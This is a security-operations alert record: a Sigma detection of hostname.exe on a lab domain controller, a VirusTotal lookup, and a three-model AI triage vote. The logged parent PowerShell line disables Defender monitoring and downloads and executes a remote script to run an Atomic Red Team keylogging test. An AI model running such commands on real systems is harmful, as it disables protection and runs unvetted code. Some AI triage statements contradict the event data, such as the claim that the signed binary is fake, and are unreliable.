{
  "author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
  "cat": "Suspicious Execution of Hostname",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"C:\\Windows\\system32\\HOSTNAME.EXE\"",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\system32\\HOSTNAME.EXE",
      "HASH": "1bff2907c456f99277f45f9b2a21b1b3f11f6c01587d9e6d6f0b2b5f1472fe92",
      "MEMORY_USAGE": 36864,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 193449984,
        "PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "PARENT_PROCESS_ID": 2440,
        "PROCESS_ID": 3164,
        "THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
        "THREADS": 32,
        "TIMESTAMP": 1774364726507,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3164,
      "PROCESS_ID": 8412,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "20060e22-1159-4303-9571-5de3f2ce9097",
      "event_time": 1774364737003,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 1313,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "6b593eddb775332b5050941f69c2a838",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ecc716e67f87d7b3840faf2069c2a841"
    }
  },
  "detect_id": "4c7a729d-401b-4b77-9bf3-685f69c2a842",
  "detect_mtd": {
    "author": "frack113",
    "description": "Use of hostname to get information",
    "falsepositives": [
      "Unknown"
    ],
    "level": "low",
    "references": [
      "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows",
      "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname"
    ],
    "tags": [
      "attack.discovery",
      "attack.t1082"
    ]
  },
  "gen_time": 1774364738321,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=ecc716e67f87d7b3840faf2069c2a841",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "20060e22-1159-4303-9571-5de3f2ce9097",
    "event_time": 1774364737003,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 1313,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "6b593eddb775332b5050941f69c2a838",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ecc716e67f87d7b3840faf2069c2a841"
  },
  "rule_tags": [
    "ext:ext-sigma",
    "attack.discovery",
    "attack.t1082"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.windows_process_creation/proc_creation_win_hostname_execution",
  "ts": 1774364738000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 0,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.917,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was there an approved change request or scheduled window for Atomic Red Team testing on this host?",
    "Are there other systems showing similar ART activity concurrently?"
  ],
  "ioc_analysis": "HOSTNAME.EXE is a legitimate Windows system binary located in the expected System32 directory. Its execution here is benign in isolation but triggers a reconnaissance rule because it is being used within an automated testing script. The parent PowerShell command line is highly suspicious as it disables Real-Time Monitoring and downloads external scripts, but this is confirmed to be Atomic Red Team activity.",
  "iocs_extracted": [
    "C:\\Windows\\system32\\HOSTNAME.EXE",
    "1bff2907c456f99277f45f9b2a21b1b3f11f6c01587d9e6d6f0b2b5f1472fe92",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
  ],
  "mitre_techniques": [
    "T1082",
    "T1059.001",
    "T1562.001",
    "T1056.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify if the Atomic Red Team simulation was authorized by the security or devops team.",
    "Ensure the test environment is isolated and that security controls are restored after testing (e.g., re-enable Windows Defender).",
    "Whitelisting the specific testing directory or parent process if such simulations are frequent and expected."
  ],
  "risk_score": 65,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe execution of HOSTNAME.EXE is part of a deliberate security simulation using the Atomic Red Team (ART) framework. The parent PowerShell process is explicitly installing ART and invoking multiple tests (T1056.001, T1567.003, T1041, etc.), which involves reconnaissance, disabling Windows Defender, and downloading scripts from GitHub.\n\n**IOC Analysis:** HOSTNAME.EXE is a legitimate Windows system binary located in the expected System32 directory. Its execution here is benign in isolation but triggers a reconnaissance rule because it is being used within an automated testing script. The parent PowerShell command line is highly suspicious as it disables Real-Time Monitoring and downloads external scripts, but this is confirmed to be Atomic Red Team activity.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nA malicious executable named HOSTNAME.EXE was created in the Windows System32 directory and executed under SYSTEM privileges. The parent process PowerShell executed commands to disable real-time monitoring and download a remote script from GitHub, indicating active command-and-control behavior.\n\n**IOC Analysis:** The file path C:\\Windows\\system32\\HOSTNAME.EXE is suspicious because legitimate system binaries do not use the HOSTNAME name. The hash does not match known Microsoft-signed binaries, and the process was executed by a PowerShell script that explicitly disables real-time monitoring and downloads from GitHub.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nA new process for HOSTNAME.EXE was created in C:\\Windows\\system32, which is a legitimate Windows command, but it was spawned by a PowerShell process that executed suspicious commands, including changing execution policy and downloading scripts from GitHub, indicating potential malicious activity.\n\n**IOC Analysis:** The FILE_PATH is in C:\\Windows\\system32, which is common for system binaries, and the HASH is signed, suggesting it might be legitimate. However, the parent process shows malicious behavior, such as disabling real-time monitoring and downloading scripts, making the context suspicious.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (low, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}